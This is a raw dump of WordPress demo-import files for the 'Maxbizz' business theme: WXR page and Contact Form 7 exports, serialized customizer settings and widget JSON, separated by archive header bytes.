:1:{s:18:"navigation_section";a:1:{s:19:"dots_spacing_mobile";i:1;}}}}s:9:"icounter2";a:3:{s:5:"count";i:4;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"icon_font";i:4;s:5:"title";i:4;s:6:"number";i:4;s:12:"after_number";i:2;}}s:5:"style";a:1:{s:21:"style_content_section";a:8:{s:10:"icon_space";i:4;s:10:"icon_color";i:4;s:12:"number_color";i:4;s:28:"number_typography_typography";i:4;s:29:"number_typography_font_family";i:4;s:27:"number_typography_font_size";i:4;s:11:"title_space";i:4;s:11:"title_color";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:14:"_margin_tablet";i:2;}}}}s:9:"iiconbox1";a:3:{s:5:"count";i:8;s:15:"control_percent";i:7;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"icon_font";i:8;s:5:"title";i:8;s:3:"des";i:8;s:4:"link";i:8;}}s:5:"style";a:3:{s:17:"style_box_section";a:9:{s:7:"is_line";i:8;s:30:"box_box_shadow_box_shadow_type";i:8;s:25:"box_box_shadow_box_shadow";i:8;s:12:"bg_hover_box";i:8;s:16:"bg_hover_icon_bg";i:8;s:33:"hover_icon_shadow_box_shadow_type";i:8;s:28:"hover_icon_shadow_box_shadow";i:8;s:20:"bg_hover_title_color";i:8;s:18:"bg_hover_des_color";i:8;}s:18:"style_icon_section";a:8:{s:9:"is_border";i:8;s:10:"icon_space";i:8;s:13:"icon_bg_width";i:8;s:10:"radius_box";i:8;s:7:"icon_bg";i:8;s:27:"icon_shadow_box_shadow_type";i:8;s:22:"icon_shadow_box_shadow";i:8;s:9:"icon_size";i:1;}s:21:"style_content_section";a:2:{s:11:"title_color";i:8;s:9:"des_color";i:8;}}}}s:5:"ictf7";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:2;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:12:"css_responce";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}}}s:8:"imember3";a:3:{s:5:"count";i:4;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:12:"member_image";i:4;s:11:"member_name";i:1;s:12:"member_extra";i:3;s:12:"social_share";i:4;s:4:"link";i:4;}}s:5:"style";a:2:{s:13:"content_style";a:2:{s:6:"bg_box";i:4;s:11:"padding_box";i:4;}s:10:"info_style";a:3:{s:11:"title_color";i:4;s:25:"job_typography_typography";i:4;s:26:"job_typography_font_family";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:14:"_margin_tablet";i:2;s:14:"_margin_mobile";i:1;}}}}s:13:"itestimonials";a:3:{s:5:"count";i:1;s:15:"control_percent";i:7;s:8:"controls";a:3:{s:7:"content";a:1:{s:20:"section_testimonials";a:3:{s:12:"testi_slider";i:1;s:5:"tshow";i:1;s:8:"autoplay";i:1;}}s:5:"style";a:3:{s:13:"style_general";a:8:{s:11:"tcontent_bg";i:1;s:14:"tcontent_color";i:1;s:35:"tcontent_box_shadow_box_shadow_type";i:1;s:30:"tcontent_box_shadow_box_shadow";i:1;s:10:"is_reverse";i:1;s:29:"content_typography_typography";i:1;s:30:"content_typography_font_family";i:1;s:28:"content_typography_font_size";i:1;}s:11:"style_tinfo";a:4:{s:10:"name_color";i:1;s:25:"job_typography_typography";i:1;s:24:"job_typography_font_size";i:1;s:26:"job_typography_font_weight";i:1;}s:18:"navigation_section";a:4:{s:12:"dots_spacing";i:1;s:19:"dots_spacing_mobile";i:1;s:12:"dots_bgcolor";i:1;s:19:"dots_active_bgcolor";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:13:"ipostcarousel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:8:"post_num";i:1;s:4:"dots";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>My account</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/my-account/</link>
		<pubDate>Thu, 01 Oct 2020 10:12:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/my-account/</guid>
		<description></description>
		<content:encoded><![CDATA[<!-- wp:shortcode -->[woocommerce_my_account]<!-- /wp:shortcode -->]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1167</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:12:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:12:45]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[my-account]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														</item>
					<item>
		<title>Main Contact</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/?post_type=wpcf7_contact_form&#038;p=1319</link>
		<pubDate>Thu, 03 Sep 2020 08:30:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=4</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="main-form">
<h4>Ready to Get Started?</h4>
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<p>[text your-site placeholder "Website"]</p>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn">Send Message</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz 
support@oceanthemes.net
From: [your-name] 
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz 
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1319</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 08:30:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 08:30:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[contact-form-1-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="main-form">
<h4>Ready to Get Started?</h4>
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<p>[text your-site placeholder "Website"]</p>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn">Send Message</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:179:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:121:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Contact form home page</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/?post_type=wpcf7_contact_form&#038;p=1536</link>
		<pubDate>Fri, 16 Oct 2020 09:36:55 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/?post_type=wpcf7_contact_form&#038;p=4</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="main-form">
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
<p class="col-md-6">[email* your-phone placeholder "Your Phone *"]</p>
<p class="col-md-6">[email* your-subject placeholder "Subject *"]</p>
</div>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn">submit now</button>
</div>
1
Maxbizz Consulting "[your-subject]"
Maxbizz Consulting <wordpress@wpdemo.archiwp.com>
support@oceanthemes.net
From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz Consulting (http://wpdemo.archiwp.com/maxbizz-consulting)
Reply-To: [your-email]




Maxbizz Consulting "[your-subject]"
Maxbizz Consulting <wordpress@wpdemo.archiwp.com>
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz Consulting (http://wpdemo.archiwp.com/maxbizz-consulting)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1536</wp:post_id>
		<wp:post_date><![CDATA[2020-10-16 09:36:55]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-16 09:36:55]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[contact-form-1-3-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="main-form">
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
<p class="col-md-6">[email* your-phone placeholder "Your Phone *"]</p>
<p class="col-md-6">[email* your-subject placeholder "Subject *"]</p>
</div>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn">submit now</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:35:"Maxbizz Consulting "[your-subject]"";s:6:"sender";s:49:"Maxbizz Consulting <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:201:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz Consulting (http://wpdemo.archiwp.com/maxbizz-consulting)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:35:"Maxbizz Consulting "[your-subject]"";s:6:"sender";s:49:"Maxbizz Consulting <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:143:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz Consulting (http://wpdemo.archiwp.com/maxbizz-consulting)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
				</channel>
</rss>
	PK�8FZ�H�	�
�
)inc/backend/data/corporate/customizer.datnu�[���a:4:{s:8:"template";s:7:"maxbizz";s:4:"mods";a:18:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:1958;s:13:"header_layout";s:3:"217";s:13:"header_mobile";s:2:"77";s:9:"body_typo";a:9:{s:11:"font-family";s:0:"";s:7:"variant";s:0:"";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:0;s:10:"font-style";s:0:"";}s:11:"second_font";a:5:{s:11:"font-family";s:9:"Open Sans";s:11:"font-backup";s:0:"";s:7:"variant";s:7:"regular";s:11:"font-weight";i:400;s:10:"font-style";s:0:"";}s:13:"heading1_typo";a:9:{s:11:"font-family";s:0:"";s:7:"variant";s:0:"";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:0;s:10:"font-style";s:0:"";}s:13:"heading2_typo";a:9:{s:11:"font-family";s:0:"";s:7:"variant";s:0:"";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:0;s:10:"font-style";s:0:"";}s:13:"heading3_typo";a:9:{s:11:"font-family";s:0:"";s:7:"variant";s:0:"";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:0;s:10:"font-style";s:0:"";}s:13:"heading4_typo";a:9:{s:11:"font-family";s:0:"";s:7:"variant";s:0:"";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:0;s:10:"font-style";s:0:"";}s:13:"heading5_typo";a:9:{s:11:"font-family";s:0:"";s:7:"variant";s:0:"";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:0;s:10:"font-style";s:0:"";}s:13:"heading6_typo";a:9:{s:11:"font-family";s:0:"";s:7:"variant";s:0:"";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:0;s:10:"font-style";s:0:"";}s:10:"main_color";s:7:"#55bb53";s:13:"footer_layout";s:4:"2219";s:11:"pheader_img";s:98:"http://wpdemo.archiwp.com/maxbizz-corporate/wp-content/uploads/sites/10/2020/09/pheader-blog-1.jpg";s:7:"preload";b:1;s:12:"preload_logo";s:92:"http://wpdemo.archiwp.com/maxbizz-corporate/wp-content/uploads/sites/10/2020/12/04_Black.svg";}s:7:"options";a:2:{s:9:"site_icon";s:4:"2135";s:23:"nav_menus_created_posts";a:0:{}}s:6:"wp_css";s:199:"@media (min-width: 1025px) {
	.team-form > span.wpcf7-form-control-wrap{
		margin-right: 10px;
	}
	.team-form input[type=text], .team-form input[type=email]{
		width: 377px;
		max-width: 377px;
	}
}
";}PK�8FZ��v���&inc/backend/data/corporate/widgets.wienu�[���{"primary":{"author_widget-2":{"title":"Tina Moriss","text":"She is the CEO. She's a big fan her cat Tux, & dinner parties","image":"http:\/\/wpdemo.archiwp.com\/maxbizz-corporate\/wp-content\/uploads\/sites\/10\/2020\/11\/author-widget.png","facebook":"#","twitter":"#","google":"","linkedin":"#","pinterest":"","instagram":"#","youtube":"","dribbble":""},"search-3":{"title":""},"categories-3":{"title":"","count":1,"hierarchical":0,"dropdown":0},"recent_news-2":{"title":"Recent Posts","count":1,"posts_per_page":"3"},"tag_cloud-2":{"title":"Tags","count":0,"taxonomy":"post_tag"},"media_image-2":{"size":"full","width":270,"height":300,"caption":"","alt":"","link_type":"custom","link_url":"","image_classes":"","link_classes":"","link_rel":"","link_target_blank":false,"image_title":"","attachment_id":2098,"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-corporate\/wp-content\/uploads\/sites\/10\/2020\/11\/bannner-widget-home4.jpg","title":""}}}PK�8FZ�&�?0)!0)!)inc/backend/data/finance/demo-content.xmlnu�[���<?xml version="1.0" encoding="UTF-8" ?>
<!-- This is a WordPress eXtended RSS file generated by WordPress as an export of your site. -->
<!-- It contains information about your site's posts, pages, comments, categories, and other content. -->
<!-- You may use this file to transfer that content from one site to another. -->
<!-- This file is not intended to serve as a complete backup of your site. -->

<!-- To import this information into a WordPress site follow these steps: -->
<!-- 1. Log in to that site as an administrator. -->
<!-- 2. Go to Tools: Import in the WordPress admin panel. -->
<!-- 3. Install the "WordPress" importer from the list. -->
<!-- 4. Activate & Run Importer. -->
<!-- 5. Upload this file using the form provided on that page. -->
<!-- 6. You will first be asked to map the authors in this export file to users -->
<!--    on the site. For each author, you may choose to map to an -->
<!--    existing user on the site or to create a new user. -->
<!-- 7. WordPress will then import each of the posts, pages, comments, categories, etc. -->
<!--    contained in this file into your site. -->

	<!-- generator="WordPress/5.6" created="2021-01-04 04:16" -->
<rss version="2.0"
	xmlns:excerpt="http://wordpress.org/export/1.2/excerpt/"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:wp="http://wordpress.org/export/1.2/"
>

<channel>
	<title>Maxbizz Finance</title>
	<link>http://wpdemo.archiwp.com/maxbizz-finance</link>
	<description>Financial &#38; Consulting Demo WordPress Theme</description>
	<pubDate>Mon, 04 Jan 2021 04:16:48 +0000</pubDate>
	<language>en-US</language>
	<wp:wxr_version>1.2</wp:wxr_version>
	<wp:base_site_url>http://wpdemo.archiwp.com/</wp:base_site_url>
	<wp:base_blog_url>http://wpdemo.archiwp.com/maxbizz-finance</wp:base_blog_url>

		<wp:author><wp:author_id>1</wp:author_id><wp:author_login><![CDATA[admin]]></wp:author_login><wp:author_email><![CDATA[support@oceanthemes.net]]></wp:author_email><wp:author_display_name><![CDATA[Tom Black]]></wp:author_display_name><wp:author_first_name><![CDATA[Tom]]></wp:author_first_name><wp:author_last_name><![CDATA[Black]]></wp:author_last_name></wp:author>

		<wp:category>
		<wp:term_id>2</wp:term_id>
		<wp:category_nicename><![CDATA[business]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[business]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>3</wp:term_id>
		<wp:category_nicename><![CDATA[consulting]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[consulting]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>4</wp:term_id>
		<wp:category_nicename><![CDATA[finance]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[finance]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>5</wp:term_id>
		<wp:category_nicename><![CDATA[marketing]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[marketing]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>1</wp:term_id>
		<wp:category_nicename><![CDATA[uncategorized]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[Uncategorized]]></wp:cat_name>
	</wp:category>
			<wp:tag>
		<wp:term_id>6</wp:term_id>
		<wp:tag_slug><![CDATA[analysis]]></wp:tag_slug>
		<wp:tag_name><![CDATA[analysis]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>7</wp:term_id>
		<wp:tag_slug><![CDATA[business]]></wp:tag_slug>
		<wp:tag_name><![CDATA[business]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>8</wp:term_id>
		<wp:tag_slug><![CDATA[consulting]]></wp:tag_slug>
		<wp:tag_name><![CDATA[consulting]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>9</wp:term_id>
		<wp:tag_slug><![CDATA[finance]]></wp:tag_slug>
		<wp:tag_name><![CDATA[finance]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>10</wp:term_id>
		<wp:tag_slug><![CDATA[marketing]]></wp:tag_slug>
		<wp:tag_name><![CDATA[marketing]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>11</wp:term_id>
		<wp:tag_slug><![CDATA[news]]></wp:tag_slug>
		<wp:tag_name><![CDATA[news]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>12</wp:term_id>
		<wp:tag_slug><![CDATA[strategy]]></wp:tag_slug>
		<wp:tag_name><![CDATA[strategy]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>13</wp:term_id>
		<wp:tag_slug><![CDATA[tips]]></wp:tag_slug>
		<wp:tag_name><![CDATA[tips]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>14</wp:term_id>
		<wp:tag_slug><![CDATA[trading]]></wp:tag_slug>
		<wp:tag_name><![CDATA[trading]]></wp:tag_name>
	</wp:tag>
			<wp:term>
		<wp:term_id>15</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[business]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[business]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>16</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[finance]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[finance]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>17</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[marketing]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[marketing]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>18</wp:term_id>
		<wp:term_taxonomy><![CDATA[elementor_library_type]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[page]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[page]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>19</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[startup]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[startup]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>20</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[strategy]]></wp:term_slug>
